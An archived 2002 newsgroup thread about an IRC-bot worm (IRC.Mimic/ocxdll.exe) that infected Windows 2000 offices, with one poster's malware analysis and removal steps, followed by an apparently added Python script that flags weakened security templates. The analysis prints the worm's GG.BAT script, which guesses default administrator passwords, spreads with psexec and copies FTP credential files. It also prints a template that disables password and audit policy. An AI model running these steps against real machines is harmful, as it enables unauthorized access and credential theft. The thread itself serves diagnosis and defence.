
mIRC and Secedit.exe


Frank

Aug 28, 2002, 12:13:54 PM
I noticed a few people asking this, but no real answer has
been given, and now the same thing is happening in our
office. On about 5 computers, all w2kpro, after logging
in, the system will real quickly execute an mirc bot
(even if mirc is not installed) and then execute secedit
and close. Since I noticed the mirc bot, I decided to do
a netstat and saw an open connection to 216.x.x.x:6667,
which is in fact an irc server. Later on, it was
discovered that the infected machines were launching DoS
attacks, clogging all our bandwidth.

What I can not figure out, for the life of me, is where
this program can be located, it's not in the startup,
already tried msconfig, and the virus scanner with latest
definitions is not picking it up. If *anyone* has any
clues or ideas I'm wide open - I have an office of people
down my back as it is. Thanks a lot,
Frank

Scott Matott

Aug 28, 2002, 2:19:48 PM
It was very frustrating to me too. It's a virus called
irc.mimic. On my system it was c:\winnt\system32\taskmngr.exe
(not to be confused with taskmgr.exe). It displays an mIRC icon.
It also has an .ini file in the same directory named NT32.ini.

BUT, the secedit commands (or something) appear to have
made my workgroup dysfunctional now; all my shares are
requiring passwords but I cannot figure out what the PSW
is! Let me know if you have that problem...


Test Man

Aug 29, 2002, 10:17:15 AM
How about going to http://www.sarc.com and looking through their
encyclopaedia? You will find out how to disinfect your system. In fact,
here is the link
http://securityresponse.symantec.com/avcenter/venc/data/irc.mimic.html

"Frank" <fr...@ascended.net> wrote in message
news:9baf01c24ead$e803b120$3bef2ecf@TKMSFTNGXA10...

Frank DeLuca

Aug 29, 2002, 10:34:09 AM
How about not being a smartass? I posted this question as
a last resort, only after Norton Antivirus, in fact, saw
nothing wrong with any of the infected systems and had
definitions updated on 8/22/02. Anyways, thanks for the
responses, I appreciate it and have cleaned everything out.


Layla

Aug 29, 2002, 11:02:45 AM
I don't really think he was being a smartass; if he was I don't think he would have
given you the link to Symantec and their instructions.

Sometimes the best answer is to direct the OP to the source of information on the
subject.

Glad to hear you have everything cleaned out!

"Frank DeLuca" <fr...@ascended.net> wrote in message
news:fea001c24f69$22ba24a0$39ef2ecf@TKMSFTNGXA08...

Frank

Aug 29, 2002, 2:11:27 PM
Ahh, regardless, I still gave him thanks. :) Funny thing
is, the link just tells you to download the latest
definitions and run the virus scan - which still does
nothing. We had to figure it out on our own. Maybe it's
a variant of the mimic one that he had posted.

Layla

Aug 30, 2002, 9:05:51 AM
You might want to look into The Cleaner at www.moosoft.com. This is a trojan cleaner.


"Frank" <fr...@ascended.net> wrote in message
news:a9b101c24f87$7e458620$9ee62ecf@tkmsftngxa05...

Edward Alfert

Aug 30, 2002, 11:26:42 AM
Frank wrote:

I know of 2 computers infected by this trojan... I have removed the trojan
but am attempting to restore the networking settings...

I have restored the default settings using secedit and a backup sdb
database but still no luck... followed instructions from microsoft technet
website.

If anybody has a solution, please post.

thanks.

--
Edward Alfert
http://edward.alfert.com/ * http://www.sysadmin.info/
"Choose a job you love, and you will never have to work a day in your life."
- Unknown Sage

Juan Martinez

Sep 2, 2002, 3:22:03 PM
Hi Scott,
I have the same virus. I cleaned it with NAV; NAV erased
NT32.INI, TASKMNGR.EXE (IRC.Bot), and other files. My
problem is with my shares now requiring a password for
access. Did you solve the problem? I need ideas.... Thank
you

Juan Martinez


PS: excuse my English, I speak little.....

Scott

Sep 2, 2002, 4:30:54 PM
I wish I had! I cannot figure out how to fix the share
password issue. I've noticed others with the same
problems and no answers either. Please email me if you
find a solution. Thanks!


aladin

Sep 4, 2002, 9:13:55 PM
More Analysis on ocxdll.exe virus:
From Kyle Lai, CISSP, CISA
alad...@hotmail.com

++++++++++++++++++++++++++
SMB over TCP attack, using port 445. It looked for weak administrator
IDs and passwords on the local Windows 2000 systems.
++++++++++++++++++++++++++

One of my clients also got infected with the ocxdll.exe virus. This
occurred back on 8/28/2002 at 3am. After some detailed analysis, I
determined that it was a Trojan, deleted the detected registry
entries, deleted the infected files, tightened the administrator ID and
password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) (if they have a backup .sdb file, then just
reapplying the security policy would fix this part), and added the users
back locally. The cause is bad security (admin ID and passwords), and a
backdoor to drop the ocxdll.exe.

Affected systems:
++++++++++++++++++
- Windows 2000. The security policy alteration was ONLY for Windows 2000.
- Windows NT - might be infected, but will not distribute or change
security policies.

What did it do?
++++++++++++
1. Hid all programs it ran.
2. Opened a backdoor on port 60609.
3. Ran the mIRC client with random usernames listed in mdm.scr, plus more
random characters.
4. Ran the bot (robot) scripts in the following order, which means
they contained malicious automated instructions:

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini

5. Replaced the security policy settings using the Microsoft security editor
(SecEdit.exe /configure) command: it reset the security policy to the
default settings and then replaced security settings with those in tftp8675.
This was done in quiet mode.
6. Scanned for 20 IPs and then started running "GG.BAT", which is the
real program that started the hacking.
7. Tried to hack into the systems using the following user IDs and
passwords. If you don't have these user IDs and passwords, maybe you
just have 1 infected system, and it could not spread via this
Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator IDs and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If the file was already there, it
copied it anyway, and did it quietly (using psexec.exe -c -f -d).
9. Ran OCXDLL.EXE without any delay (psexec.exe -d), which
extracted the 17 files that are in this self-extracting file.
10. Tried to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to the "c:\windows\system32" directory.
(Maybe to get the configuration from the bot?)
11. Started "taskmngr.exe", which was really mIRC.EXE, an IRC
client.
12. The scripts kicked in to HIDE the mIRC window, so you can
ONLY see it in the process list. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager).
13. xvpll.hlp reported Trojan status back to the hacker: either
attempt failed or attempt successful.
++++++++++++
Disclaimer: The IRC bot scripts have not been fully analyzed. This is
what I have understood so far. The removal instructions WILL remove the
trojan.
++++++++++++

Impact:
+++++++++++++
This may be a random attack. However, there is a file, ncp.exe,
involved, which is the NetCat program. This program allows the
hackers to gain full control of your system. Therefore:
1. Best-case scenario is that it was a hack, and no sensitive data
were lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that is not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
+++++++++++++

How to remove the Trojan:
++++++++++++++++++++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

****************
****NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.

****************

2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run:
remove "taskmngr.exe" (this starts the mIRC client program during
Windows startup).
3. Change the LOCAL Administrator password on ALL systems! Make sure
they are strong passwords! Use a mix of uppercase, lowercase, numbers,
and non-alphanumeric characters, i.e. _,+,=,), ...
4. If possible, change the Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers.)
5. Restore the default security policy settings by typing "secedit
/configure /db C:\WINNT\security\Database\secedit.sdb"
6. Go to Start -> Programs -> Administrative Tools -> Local Security
Policy, click on "User Rights Assignment", and add users and groups
back into the policy "Access this computer from the network". The
default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[SYSTEM_NAME]

Additional Recommendation:
--------------------------
1. Tighten your firewall and block ANY and all unwanted traffic from accessing
ports, BOTH inside to outside and outside to inside.
2. Rename your administrator user ID to something else, and create a
user ID called "Administrator" with NO GROUPS. This will allow you to
monitor anyone trying to use the "Administrator" login.
3. Set up the security log, at minimum logging successful and failed
Logon/Logoff, and monitor the event logs.
++++++++++++++++++++

More details:
Infection:
registry entries
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run:
remove "taskmngr.exe" (this starts the mIRC client program during
Windows startup).

When the mIRC client started running, it ran the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant "configure your system settings with the
default security policy, plus the additional settings in tftp8675".
It basically removed many security restrictions, removed all audits for
the systems, and of course removed all users from the "Local Users
allowed from the net".
List from TFTP8675:
----------------------
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--------------------------

OCXDLL.EXE is a self-extracting file that included 17 files. It is a
Trojan and it's a worm. In dll32nt.hlp, it has an instruction to
do an IP scan and store the 20 IP addresses it found. Most likely it
scanned the subnet and file servers that were connected to the victim
systems at that time. Then it has an instruction at the end to run
GG.BAT, which is the instruction to attack the 20 IPs that it just
found.


Here are the files that were extracted from ocxdll.exe:
+++++++++++++++++++++++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++++++++++++++


Here is the GG.BAT text:
------------------------
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
------------------------

-------------------------------------
From Sysinternals, here is the description of what the PSEXEC
parameters do:
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
non-interactive applications.
---------------------------------------
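A defender-side check of the kind this analysis calls for, added here as an example (it is not code from the thread or from its author): it parses a secedit template such as the tftp8675 listing above and reports every setting that falls below a chosen floor, so a weakened policy can be spotted before it is applied or when a box is triaged. The baseline values are assumptions, the SeNetworkLogonRight key name (the template key behind "Access this computer from the network") is assumed rather than shown in the thread, and the sample template is constructed.

```python
import configparser

# Defensive floor per setting (constructed baseline, not values from the thread).
# Audit values: 0 = none, 1 = success, 2 = failure, 3 = success and failure.
BASELINE = {"MinimumPasswordLength": 8, "PasswordComplexity": 1,
            "PasswordHistorySize": 5, "LockoutBadCount": 5,
            "AuditLogonEvents": 3, "AuditAccountLogon": 3, "AuditPolicyChange": 3}

def parse_template(text):
    """Parse the INI-style template that secedit /configure /cfg consumes."""
    # Keys before any section header (as in the thread's tftp8675 listing)
    # belong to [System Access].
    if not text.lstrip().startswith("["):
        text = "[System Access]\n" + text
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep the original key case
    cp.read_string(text)
    return {s: dict(cp.items(s)) for s in cp.sections()}

def find_weakened(text):
    """Return (section, key, value, reason) for every setting below the floor."""
    findings = []
    for section, items in parse_template(text).items():
        for key, raw in items.items():
            if key in BASELINE:
                try:
                    value = int(raw)
                except ValueError:
                    findings.append((section, key, raw, "non-numeric value"))
                    continue
                if value < BASELINE[key]:
                    findings.append((section, key, value, f"below floor {BASELINE[key]}"))
            # "Access this computer from the network" is SeNetworkLogonRight in the
            # template (assumed key name); an empty list locks everyone out of shares.
            elif key == "SeNetworkLogonRight" and not raw.strip():
                findings.append((section, key, raw, "no accounts may log on from the network"))
    return findings

# Constructed sample modelled on the tftp8675 values quoted in the thread.
SAMPLE = """MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountLogon = 0
[Privilege Rights]
SeNetworkLogonRight =
"""
```

Running find_weakened(SAMPLE) returns six findings: three password settings at 0, two audit categories switched off, and an empty network logon right, which is exactly the symptom the thread's share-password reports describe.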
